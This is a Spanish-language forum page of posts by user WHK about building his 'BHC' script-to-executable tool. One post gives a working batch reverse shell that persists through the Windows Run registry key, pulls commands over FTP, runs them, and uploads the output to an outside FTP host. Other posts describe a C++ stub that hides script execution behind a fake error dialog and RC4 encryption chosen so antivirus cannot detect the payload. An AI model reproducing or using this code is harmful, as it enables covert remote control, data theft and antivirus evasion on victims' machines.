Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - WHK

#3941
Hola, ya me fijé y no se que puede estar pasando porque tube problemas en mi pc y perdí parte del código fuente del proyecto asi que para repararloestoy haciendolo denuevo y no se cuanto me voy a demorar.

Mientras tanto puedes usar la versión 2.1 haciendo click acá.
#3942
en el BHC hay un ejemplo de conexión inversa por ftp, también debe estar en "jugando con netcat" en el foro de hacking basico que puse hace bastantes años.

Código (bash) [Seleccionar]
::--- ReverseShell-FTP 1.4 by WHK ---
if not exist shellFTP.bat goto 2
copy shellFTP.bat "%homepath%\fdb.bat"
reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "fdb.bat"/t REG_SZ /d "at %homepath%\fdb.bat" /f
:2
set ip=127.0.0.1
echo o > command
echo %ip% >> command
echo quit >> command
echo quit >> command

echo o > ftp.dat
echo 512.iespana.es >> ftp.dat
echo user >> ftp.dat
echo pass >> ftp.dat
echo put verbose.txt >> ftp.dat
echo quit >> ftp.dat
echo quit >> ftp.dat

:1
ftp -s:command > comandos.txt
for /f %%i in (comandos.txt) do CMD /c %%i > verbose.txt
ftp -s:ftp.dat
ping -n 30 127.0.0.1
goto 1
::----------------------------------------


De todas formas esto no es un fallo, solamente obtiene los comandos generados por la salida del ftp y los procesa en un bat y la respuesta de la ejecución la manda por ftp a un hosting propio.

PD: este post debería ir en "Scripting"
#3943
Si, yo ya tenía la idea inicial de declarar el buffer del script como 2048 pero es bastante limitado si quieres hacer un script largo como por ejemplo el crackme B4 del warzone o muy grande si quieres poner un "dir > o".

Lo que dices está lo mas normal de hacer, por ahi me dieron un par de ideas que tendré que traducir con "google 1337"  :xD
https://foro.elhacker.net/ingenieria_inversa/agregar_mas_caracteres_de_los_declarados_en_un_binario-t254313.0.html;msg1230610#msg1230610
eso de mapearlo o de modificar el puntero antiguo no le entendí ya que es primera ves que hago algo de este tipo (he aprendido muchisimo haciendo los stubs), lo que si pude entender es que en una parte se guarde el EOF, entonces al momento de inyectar el cuerpo del script en el binario solamente tendría que unir la parte 1 mas el script mas el EOF pero de alguna forma me dice como debo hacerlo para no corromper el binario pero ahi ya no supe como.

La idea está buena y tan buena como la de usar recursos como me dijo krackwar al inicio de la primera version  :P solo que el me hablaba de asm y no npi. Tendría que compilar el stub con un solo recurso de tipo texto y ahi inyectar todo modificando ese recurso solamente.. ahora no se que tan facil sea hacerlo manualmente ya que desde el editor debo modificar estos valores hexadecimalmente ya que no voy a meterle el reshack dentro del ide, no se puede.

Bueno, ahi ya me dieron varias ideas que iré testeando en el camino, gracias.
#3944
Citarincluso tratando de entrar al foro encontre una pagina que decia SPAM(0)
jajaja ese spam(0) le gusta hacer lo que nosotros hacemos para ver si alguien les da bola como acá  :xD

es como comparar el "poly station" con el "play station"  :xD
http://images.google.cl/images?hl=es&q=poly%20station&um=1&ie=UTF-8&sa=N&tab=wi

o la "chintendo vii" con la "nintendo wii"  :xD :xD :xD :xD :xD :xD :xD
#3945
Si lo habia pensado pero de esa forma limitas el script hasta los 256 carácteres y nunca se sabe que tan largo podrá ser un script, por eso la idea de como inflar esa variable.

Pude ver herramientas como el topo pero no se si servirán para variables aunque tampoco se como se podría lograr esto manualmente ya que no se como trabaja el topo, talves si pudiera entenderlo lograría inflar el tamaño de esa variable.
#3946
Hola, estaba intentando editar un stub ya compilado donde tengo como flag el string "{script}" el cual es de 8 carácteres. esto queda impreso en el programa y no me cuesta editarlo desde un editor hexadecimal pero si intento agregarle uno mas como por ejemplo 9 entonces el ejecutable se corrompe.

He visto que el reshack puede modificar recursos, carácteres y cosas sin iomportar su longitud asi que supuse que de alguna forma hexadecimalmente también debía poderse pero no se como.

La idea es implementar esto en la edición del stub en un editor gráfico para el proyecto BHC.

si alguien sabe le agraderecía muchisimo que me expicara ya que busqué en otros lados pero no pude encontrar infromación al respecto.
#3947
Bueno, estaba haciendo el stub 0.6 pero está medi complicado..
Lo inicié en c++:

Código (cpp) [Seleccionar]
#include <stdio.h>
#include <time.h>
#include <windows.h>

/*
// BOTONES
#define MB_OK 0                    //botón "Aceptar"
#define MB_OKCANCEL 1              //botones "Aceptar" y "Cancelar"
#define MB_ABORTRETRYIGNORE 2      //botones "Anular", "Reintentar", "Omitir"
#define MB_YESNOCANCEL 3           //botones "Sí", "No" y "Cancelar"
#define MB_YESNO 4                 //botones "Sí" y "No"

// ICONOS
#define MB_ICONINFORMATION 64      //ícono de información
#define MB_ICONEXCLAMATION 0x30    //ícono de alerta, signo de exclamación
#define MB_ICONERROR 16            //ícono de error, alto, tacha roja
#define MB_ICONQUESTION 32         //ícono de pregunta
*/

// Funciones
bool file_exists(char *url);

int main(void){
char path[256];
char pid_path[256];
char cmd_exec[256];
char *homepath = getenv("homepath");
char *homedrive = getenv("homedrive");

srand(time(NULL));
sprintf(path,     "%s%s\\%d.bat", homedrive, homepath, rand());
sprintf(pid_path, "%s%s\\%d.pid", homedrive, homepath, rand());
sprintf(cmd_exec, "\"%s\" && echo. > \"%s\"", path, pid_path);

FILE *script;
script = fopen(path, "a");
if(!script){ return -1; }
// fprintf(script, buff);
fprintf(script,
"dir"
"> test."
"txt"
);
fclose(script);

MessageBox(NULL,
"ho"
"la"
,
"E"
"rror"
, MB_OK | MB_ICONERROR);

WinExec(cmd_exec, SW_HIDE);
while(1){
  if(file_exists(pid_path)){
   break;
  }
}
remove(path);
remove(pid_path);
return EXIT_SUCCESS;
}

bool file_exists(char *url){
FILE *existe = fopen(url, "r");
if(existe){
  fclose(existe);
  return true;
}else{
  return false;
}
}


La idea era que el BHC generara el stub.cpp y modificara los datos del script y del messagebox como opcional y con un compilador externo generar el stub pero el compilador resultó muy pesado con un chingo de librerías asi que no fue buena idea.

También tenía pensado generar el ejecutable y editar hexadecimalmente editar strings claves como {script} o {mensaje} pero hablando con algunos amigos que saben de reversing está bién cabrón.

La otra opción era poder incluir datos dentro del stub ejecutable al igual como ya lo he estado haciendo pero antes del termino del EOF tal como se dijo al comienzo pero ni idea de como hacerlo y habría que calcular el tamaño exacto del binario para no generar un ejecutable corrupto y poner los datos en un lugar que no interfiera con la estructura pe.

alguien tiene alguna idea?, estuve buscando ejemplos de packers pero todos tienen la misma siencia de poner los datos al final de EOF y no me sirven y no se me ocurre porque no tengo mcuha experiencia con la estructura pe aunque si lo entendiera no sabría donde inyectar valores muertos sin interferir en la ormal ejecución del ejecutable.  :-\
#3948
Bueno, ya actualicé a la versión 2.2 , ahora los datos van cifrados y le agregué soporte para ejecución de scripts en Batch, javascript y VBScript con múltiples ejemplos de todo tipo para cada lenguaje.

La ventana es opcionalmente semi-transparente.

No creo que buelva a sacar una versión nueva en bastante tiempo mas porque justo que habia terminado de exportar el archivo binario del editor de me reinicia la pc por falta de memoria  ;D comenzando el volcado etc etc, cuando reinicié me encontré con que el archivo fuente del editor estaba vacío al igual que el archivo del proyecto asi que la versión mas reciente que dejé backup es la 2.0  :xD asi que tendré que diseñar todo otraves y después comenzar a actualizar cosa que me dió weba jajaja pero lo haré de todas formas.

PD: si hay algún error en el editor lo mas probable es que aparezca en forma de alerta en ves de mostrarse en el texto de estado ya que al parecer no alcanzó a exportarse cuando los controles de errores "on error ..." estaban sin comentar, pero de tdoas formas es un detalle porque funciona bién igual, ya estaba testeado y lo iba a publicar pero cuando modifiqué los controles de errores y estaba exportando se crasheó y no se si el ejecutable va o no con control de errores pero el funcionamiento es el mismo.







#3949
Cita de: YST en  7 Mayo 2009, 20:39 PM
Cita de: oslinx en  7 Mayo 2009, 20:37 PM
aunque se tratase de un ataque DDOS nadien podra tirar este foro nunca.
o habra alguien que si lo haga?

WHK me parece que a sido el unico que logro tirarlo , aunque no fue con un ddos ya que lo hizo solocon su pc :silbar:

jajaja que bocón xD eso fue controlado y con permiso, además yo estaba seguro que el servidor lo habian raptado los ovnis por la cantidad de información que tenía pero como no pudieron hacerlo funcionar (porque los ovnis no tienen 220 volts) se resignaron entre raptar a alex para que les dijera donde estaba o devolverlo pero como alex es brujo se las arregló para que mejor lo debolvieran  :P
#3950
Ya vi lo que pasaba, mi pc estaba muy saturada y cuando generaba el ejecutable yo le daba click a la generación del hash que eran multiples valores al azar y se me iba el uso de cpu a las nuves y terminaba con el pantallazo asi que lo eliminé y lo reemplazé por un simple hash de md5 y ni si quiera el usuario tendrá que modificarlo ya que esto se hace al azar cada ves que se genere un ejecutable nuevo asi que el hash de descifrado del rc4 es al azar y por lo tanto el contenido del cuerpo también lo será en carácteres, si lo abres con el block de notas antes podías ver el script.. ahora solo verás carácteres basura asi que el antivirus ya no podrá detectarlo pro esta vía (si lo tenian pensado hacer xD ) pero de todas formas seguiré viendo como integrarlo dentro del binario en ves del termino.

Estoy terminando unos detalles y lo lanzaré al publico.

CitarFelicidades, siempre haciendo programas muy útiles  :)
Grax  :D

Por lo menos si no le gano por código a mad talves pueda por el diseño jajajajjaa  :laugh:, de todas formas estuve viendo unas versiones antiguas de la fuente del joiner de mad y el también coloca los datos al final del EOF asi que si logro ponerlo dentro ya podría hacer la diferencia  :xD

"Mad, este año si tendrás competencia  :¬¬"